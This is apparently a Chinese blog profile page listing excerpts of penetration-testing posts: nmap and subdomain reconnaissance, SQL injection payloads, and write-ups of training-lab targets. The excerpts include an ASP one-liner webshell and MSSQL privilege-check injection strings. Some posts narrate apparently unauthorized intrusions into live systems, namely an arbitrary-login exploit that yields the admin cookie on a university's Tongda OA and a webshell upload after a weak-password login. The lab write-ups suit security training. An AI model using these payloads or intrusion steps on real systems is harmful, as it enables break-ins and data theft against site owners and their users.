- 博客(30)
- 资源 (13)
- 问答 (1)
- 收藏
- 关注
原创 子域名收集
前言:你不分享,谁与你共享!子域名(或子域;英语:Subdomain)是在域名系统等级中,属于更高一层域的域。比如,mail.example.com和calendar.example.com是example.com的两个子域,而example.com则是顶级域.com的子域。、顶级域名(一级域名):.com/.cn/.org/.jp……二级域名:XX.com/XX.cn/XX.org……子域名:zz.xx.com/zz.xx.cn/zz.xx.org……子域名收集是信息收集中关键的一部分
2022-03-25 15:30:38
49145
1
原创 NMAP ——进阶
namp使用前言:你不分享,谁与你共享编辑切换为居中添加图片注释,不超过 140 字(可选)绕过/欺骗 FW NAMP扫描不进行DNS解析(EXP:namp ip -n -Tx -sV -A)-n:不进行DNS解析。-T(0-5)上图有详解与扫描顺序相关 NAMP快速扫描常用端口(EXP : namp ip -n -Tx -sS -Pn -F) -F:快速扫描。上图序号6有更多与防火强相关扫描口令。 NAMP继续扫描被中断的扫描(EXP:namp --oG
2022-03-22 20:04:48
4382
原创 NMAP——如何使用
NAMP:扫描常用命令前言:你不分享,谁与你共享!EXP:namp新手如何进行扫描(假如你拿到一个站,你要进行端口扫描以确定怎么开展渗透)NAMP → 目标确定 → 主机发现 → 端口扫描 → 扫描技术 → 探测服务 →探测防火墙 → 性能优化 →报告day1(先自己尝试使用以下这些命令)目标确认(已知单目标)(namp x.x.x.x /http://url.com) 端口扫描以89为例( EXP : sudo nampurl.com-p 89 -sS) -sS 是 TCP ..
2022-03-19 10:58:23
3529
原创 web渗透测试——如何展开
摘要:信息收集→渗透→提权→权限维持→清除痕迹前言:你不分享,谁与你共享!1.信息收集——收集那些东西登录后台(Google hack 语法 exp: inurl:login.php/system.php/houtai.asp/自行baidu谷歌黑语法) 数据库下载&链接&登录地址(exp:phpmyadmin) 敏感文件下载地址(exp: config.ini/sys.ini) 网站目录&框架(exp: 搜索引擎(zoom/shodan/fofo)、pytho
2022-03-19 10:56:51
2408
原创 常用注入语句分享——<sql注入>
//看看是什么权限的and 1=(Select IS_MEMBER('db_owner'))And char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--//检测是否有读取某数据库的权限and 1= (Select HAS_DBACCESS('master'))And char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --
2021-10-08 20:45:02
290
原创 细心——<漏洞实战>
这不是刚起床嘛。那就活动活动筋骨把~~~这后台乍一看像是良精的程序。Admin admin弱口令进入之。可是仔细看了一下。并没有良精后台传说中的页面,,连良精的通杀拿shell的配置页面/admin/SiteConfig.asp都消失的无影无踪。我估计这是良精的改版或者页面被管理员删除了。看到一上传页面。抓包上传之。可是不管是用神马类型的方式上传。显示的结果都是gif后缀。这时候翻到文件上传管理,发现了文件管理中有asp的文件。访问之确实是我刚才上传的小马.
2021-10-08 20:38:25
1520
原创 网络安全——入侵技巧
网络渗透中的一些细节和技巧后面做了一些补充 关于在phpmyadmin里UDF提权的一些细节大型站点渗透的思路要么就是旁注,要么就是攻陷C段服务器嗅探。因为独立域名服务器,那么就只有从C段下手了。用iisputscaner扫描有IIS写权限漏洞的服务器。发现有一台可以利用,随后拿到webshell,当我费尽千心万苦提权拿到3389后,发现这台服务器跟目标不是一个网段,中间用iisputscaner扫描开放web服务的机器。对于80端口渗透我是这样做的:1、首先在url后面加ad.
2021-09-29 22:57:03
1626
原创 记一次通达oa17版漏洞<某高校使用中系统>
前几天无聊FOFA搜了一下通达oa17版本的指纹。意外发现漏洞URL漏洞详情http://222.XXXX:post/存在通达OA任意用户登录,可以拿到管理员权限,进而获得进一步深入操作在http://222. 222.XXXX:post//处输入admin/admin并抓包1、首行的地址改为/logincheck_code.php2、删除Cookie一行3、尾行最后加上&UID=1成功获取到管理员的cookie值访问:http://...
2021-09-29 22:42:24
532
原创 post/get注入——靶场操作记录<掌控安全>
post注入第一题——————————分析靶场——————————发现区别怎么没有id=1?没有那我自己输入试一下看行不行得出答案……不行post & get 区别一get 会进行url编码再次寻找用户可以自己输入数据的地方尝试万能密码登录试一下发现界面发生变化————————————————尝试注入———————————————再次输入其他信息试一下发现输入内容被两个单引号所闭合这会造成输入内容当成字符串,而不是代码
2021-09-28 15:46:54
505
原创 sql显错注入——靶场操作记录<掌控安全>
掌控安全学院SQL注入靶场存在index.php? 前几节课讲过?一般为get传参!当然界面上也说了————————————————开始尝试——————————————1.判断是否存在注入当输入id=2时页面发生变化再继续掌控安全学院SQL注入靶场当加上条件and1=2时界面不显示(报错)基本确定存在注入————————————————判断字段数——————————————掌控安全学院SQL注入靶场输入order by 4 之后原本显示正常的界面显示不正常!判断当前表中字段.
2021-09-28 15:41:01
2678
1
原创 正则表达式——靶场操作记录<掌控安全>
——————————————分析flag代码————————————//告诉这是PHP咯<?php$key=’flag{**}’;$Regular= preg_match(“/zkaq.key.{2,9}:\/.\/(keykey)/i”, trim($_GET[“id”]), $match);if( $Regular ){die(‘key: ‘.$key);} //if结尾咯(但是为什么没有‘?>’结尾呢)——————————————分析flag代码2————————————
2021-09-28 15:30:21
212
原创 越权——漏洞操作记录<掌控安全>
越权漏洞越权分为两种:一种为水平越权,一种为垂直越权。水平越权:指同权限之间能相互修改或查看对方的资料(比如:同为用户 用户A可以查看用户B的资料)垂直越权:指低权限用户能够修改或查看高权限用户的资料(比如:用户组A能够拥有管理组B的权限)进入靶场http://117.41.229.122:8002此处提供注册(不能提供注册的利用信息收集)先注册两个账号用户1:twalone用户2: twalone1先进行两个号的水平越权使用BurpSui...
2021-09-27 21:32:43
306
原创 密码找回漏洞—靶场操作<掌控安全>
这题主要就是绕过验证码来到靶场根据靶场提示访问:http://117.41.229.122:8010/hahq_Admin/?umail=408362692@qq.com&type=ok发现是一个重置密码的页面我们把这题的源码下载下来进行审计全局搜索里搜:密码找回通过审计发现,$fsjs=rand(10,10000)随机生成认证码,只有认证码一样就可以重置密码我么通过抓包进行爆破爆破成功...
2021-09-27 21:24:40
699
原创 信息安全——渗透测试(黑盒)
banner 识别 whatweb 资料:http://www.freebuf.com/tools/13063.htmlwebfiles扫描网站备份扫描 bak文件目录遍历是否存在未授权访问url工具:1御剑(完善字典)2 weakfilescan 资料:http://zone.wooyun.org/content/19523sql注入sqlmap 资料:http://drops.wooyun.org/tips/143xss案例:http://www.wo...
2021-09-23 21:06:05
851
原创 信息安全——常见弱点端口扫描
21 ftp 主要看是否支持匿名,也可以跑弱口令22 ssh 弱口令爆破23 telent 弱口令爆破80 web 常见web漏洞(后面细说)以及是否有一些后台161 SNMP public 弱口令 案例:http://www.wooyun.org/bugs/wooyun-2021-0105926389 ldap 是否有匿名访问 案例:http://www.wooyun.org/bugs/wooyun-2021-092789443 openssl 心脏出血以及一些web测试漏...
2021-09-23 20:36:15
328
原创 信息安全——IP
C端ip服务器操作系统类型端口开放和服务识别目标网络结构和服务识别目标网络结构 tracert工具namp 资料:http://drops.wooyun.org/tips/2002同服站点http://dns.aizhan.com/http://www.114best.com/ip/114.asp?w=IPhttp://www.cnwzml.com/IP欢迎补充……容易忽略的点github敏感信息泄露 案例:http://wooyun.org/bugs/w
2021-09-22 23:52:48
213
原创 信息收集——善用搜索引擎
搜索引擎Google.com利用Google收集域名和mail地址:theHarvester神器(baidu看一下)Google_hack搜索敏感文件:site:xxx.com filetype:doc/docx intext:passsite:xxx.com filetype:xls/xlsx intext:passsite:xxx.com filetype:confsite:xxx.com filetype:inc更多baidu一下搜索mailsite:...
2021-09-22 22:27:42
569
原创 网络安全之——信息收集
网络安全之——信息收集域名信息域名注册人信息收集:http://whois.chinaz.com子域名爆破域传送漏洞:http://drops.wooyun.org/paper/64信息收集工具dnsenumlayer子域名挖掘机subDomainsBrute 学习资料:http://zone.wooyun.org//content/19492wydomain 学习资料:http://zone.wooyun.org/content/18459绕过CDN找到目标IP段phpinfo(
2021-09-22 22:06:32
200
原创 SQL过滤字符后手工注入漏洞测试(第2题)——<墨者学院漏洞记录>
http://219.153.49.228:40519/new_list.php?id=1http://219.153.49.228:40519/new_list.php?id=1'http://219.153.49.228:40519/new_list.php?id=1'%23http://219.153.49.228:40519/new_list.php?id=1' and 1=1经过上面几轮测试,可以看出本题:空格,单引号,等号,union,select,from都过滤。因此进行替换:
2021-07-16 15:16:32
248
2
原创 SQL注入漏洞测试(delete注入)——<墨者学院漏洞记录>
1、 打开链接界面,可以自行测试留言2、 提交留言,查看网页源代码3、在浏览器中自行添加后缀,并使用单引号测试注入点,发现存在报错行注入,报错型注入的方法大概有10种左右,这里分别使用floor、updatexml和extractvalue三种常用的方法。4、 使用extractvalue注入方法获取当前数据库信息注入语句:and (extractvalue(1, concat(0x5c,(select database()))))报错反馈得出数据库名称为
2021-07-16 15:14:01
454
1
原创 SQL注入实战(防注入)-Access<墨者学院漏洞操作记录>
1、 打开靶场拿御剑扫秒后台百度得知所有记录会保存在sqlin.asp的目录2、 插入一句话木马 <%eval request(“user”)%>http://219.153.49.228:47828/news.asp?id=1%20and%201=%3C%eval%20request(%22user%22)%%3E3、 对木马进行URLencode使用菜刀连接并找到key;...
2021-07-16 15:06:49
359
原创 SQL过滤字符后手工绕过漏洞测试(万能口令)
根据提示,在登录页面输入用户名为 admin' 密码随意:点击登录,出现错误,发现错误提示:根据错误提示,修改注入语句,密码随意:点击“确认登录”,获得KEY:常用万能密码:https://blog.csdn.net/zz_Caleb/article/details/85063283...
2021-07-16 14:53:17
451
原创 SQL过滤字符后手工注入漏洞测试(第3题)-墨者学院漏洞操作记录
打开漏洞地址http://219.153.49.228:41317/new_list.php?id=1,加入单引号,页面报错:order by 确定只有7列:联合查询可知2,3,4可以利用:爆出当前数据库和用户:爆出该数据库下的表:爆出stormgroup_member表下的字段:爆出username和password字段内容:然后进行解密。尝试得出正确的账户密码...
2021-07-16 14:49:08
105
原创 SQL手工注入漏洞测试(MySQL数据库-字符型)——漏洞记录
一进来看到一个停机公告,点开查看发现链接中有字符参数,怀疑存在字符型注入输入 ' and '1'='1 和 ' and '1'='2 测试是否存在注入 ' and '1'='1' and '1'='2发现当输入 'and '1'='2 时,网页发生了错误,确认存在注入。通过order by 子句判断字段数order by 1order by 2order by 5order by 4当order by 4 时网页正常响应,by 5时
2021-07-16 14:44:46
469
1
原创 sql(时间盲注)——墨者学院——漏洞操作记录
Sql时间盲注1、 开始的页面,但是不是这个页面,点击下面的任性网页2、提示再url中传参,加个逗号 ?type=1’既然提示是时间盲注,那就?type=1’ and sleep(5)%23没有时间延迟去掉单引号有时间延迟5秒因为是时间延迟,没有任何回显,那只能用python写脚本或者用sqlmap这里是脚本,但是后面有错误,我找不到原因,只能查到flag、goods表的字段import requests import datetime i
2021-07-16 14:40:43
286
原创 SQL注入漏洞测试(HTTP头注入)——操作记录
burp抓包判断注入位置,回显正常有报错,存在注入点确认列数确认返回位置查询当前数据库以及数据库版本返回库名:pentesterlabunion select 1,2,3,(select group_concat(table_name) from information_schema.tables where table_schema=database())表名:comment,flag,go
2021-07-16 14:27:02
199
原创 宽字节注入——漏洞记录
宽字节注入已知目标IP为:http://219.153.49.228:41742/new_list.php?id=1,加入单引号后页面并没有报错加上%df,可以看到页面报错,说明是单引号闭合:后面跟上正常sql注入语句即可,order by判断列数,为5时返回正常:为6时,返回报错:联合查询,看到3和5可利用:查询当前数据库和用户:查询表格:查询stormgroup_member
2021-07-07 15:15:50
349
原创 显错注入——漏洞记录
sql注入漏洞测试(报错注入)访问靶场,又看到通知栏的滚动条查看url ?id=1 是不是很惊喜。这个东西get传参。直接在url中操作:’ , ‘ and 1=1 或者 ’and 1=2 注意可以加上--+注释看一下字段数 order by 5 的时候出现页面报错说明四个字段,尝试union select系统过滤了我们输入的union。怎么办,考虑绕过过滤:大小写,字符串编码大小写混用,绕过过滤。并获得显错位置接下来就是常规操作id=-1
2021-07-07 15:01:27
124
原创 盲注——漏洞/靶场操作记录
SQL注入漏洞测试(布尔盲注)——解题记录打开靶场界面先简单查看url,在输入框输入东西。都没有反应。看到下方滚动条,点击后页面跳转。查看url,对url进行简单的漏洞测试,发现页面只有T/F。盲注存在!对于盲注最快的无非是sqlmapsqlmap -U --batch --dbs .......password 密文 可尝试各种解密。一般md5完成布尔盲注难点:找注入点,细心。技术特点:手工注入只能返回T/F ,需要猜!什么是盲注
2021-07-07 14:33:55
244
原创 漏洞操作记录—— X-Forwarded-For 注入漏洞实战
墨者学院 X-Forwarded-For 注入漏洞实战——解题思路打开漏洞靶场链接随便输入账号密码点击登录出现弹窗弹窗显示IP地址用burp抓一个包看看流量包中发现X -forwarded-for: 缺失把抓到的包发送到repeater中,在请求头中增加X-Forwarded-For: ' 发现报错还可改为127.0.0.1'尝试用字符看看能不能闭合尝试闭合成功,很明显常见字符型注入尝试爆数据库库database..
2021-07-07 11:10:56
948
1
CQF近两年教程,全套+中文讲义,价值8000
2024-07-11
摄影剪辑课程,价值668,包含拍摄及剪辑技巧
2024-07-11
PMP认证日常IT项目管理思维导图
2022-03-14
想问一下各位大神如何把自动遍号变成的12 13 变成汉字的十二 十三
2020-07-24
TA创建的收藏夹 TA关注的收藏夹
TA关注的人